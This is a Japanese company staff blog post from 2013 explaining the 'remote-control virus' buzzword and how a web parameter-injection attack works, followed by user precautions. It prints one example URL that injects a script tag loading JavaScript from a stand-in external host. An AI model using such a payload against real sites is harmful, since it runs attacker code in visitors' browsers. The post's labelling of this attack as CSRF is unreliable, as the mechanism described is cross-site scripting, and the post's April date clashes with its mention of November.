Staff’s Blog

開発実績

Staff's Blog

採用情報

  • 日本ベンチャーシステム株式会社
  • 〒541-0051
    大阪市中央区備後町1丁目4番5号
    堺筋東野村ビル5階
  • TEL:06-6266-8755
  • お問い合わせ
流行語とIT
2013/04/22/(月)10:40

今年も残すところ1ヶ月余りです。歳を取ると1年があっという間に過ぎてしまいます。
そうそう11月と言えば…みなさんは何を思い浮かべますか?

この時期になると流行語の候補ワードがマスメディアに取り挙げられます。その中でも私が気になったのは「遠隔操作ウィルス」です。

CSRF(クロスサイトリクエストフォージェリ)を使って意図しない投稿が意図しないサイトに送信されるというものですが、
CSRFの実際の手口はどういったものか認識がない人が多いのではないでしょうか。

攻撃者が脆弱性のあるサイトを発見し、そこに不正なHTMLが展開されるようなパラメータを埋め込んだリンクを掲示板などに投稿します。
そのリンクをクリックした第3者が不正なスクリプトが実行してしまうというものです。

そもそも脆弱性のあるサイトとはどういうものなのかですが、パラメータを画面に表示する際にHTMLタグのエスケープが漏れているというケースです。
例えばparamというパラメータを画面で表示する際にエスケープしていない場合、本来paramの内容を表示する位置にHTMLタグが展開されてしまいます。
そうなると次のようなリンクをクリックすればxxx.jsが実行されてしまうことになります。
http://aaa.com/?param=<script src="http://bbb.com/xxx.js"></script>

今回のように第3者が事件に巻き込まれてしまったということもあり、インターネット利用する際には少なからず脅威の認識は必要であると感じます。
第3者の対策としては、URLを見て怪しいと思えばアクセスしない、バージョンが古いブラウザを使用しない、といったことを気を付ければよいかと思います。

カテゴリー
  • その他
  • イベントキャンペーン
  • インフォメーション
  • 最新情報
カレンダー
2013年4月
  1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30        
アーカイブ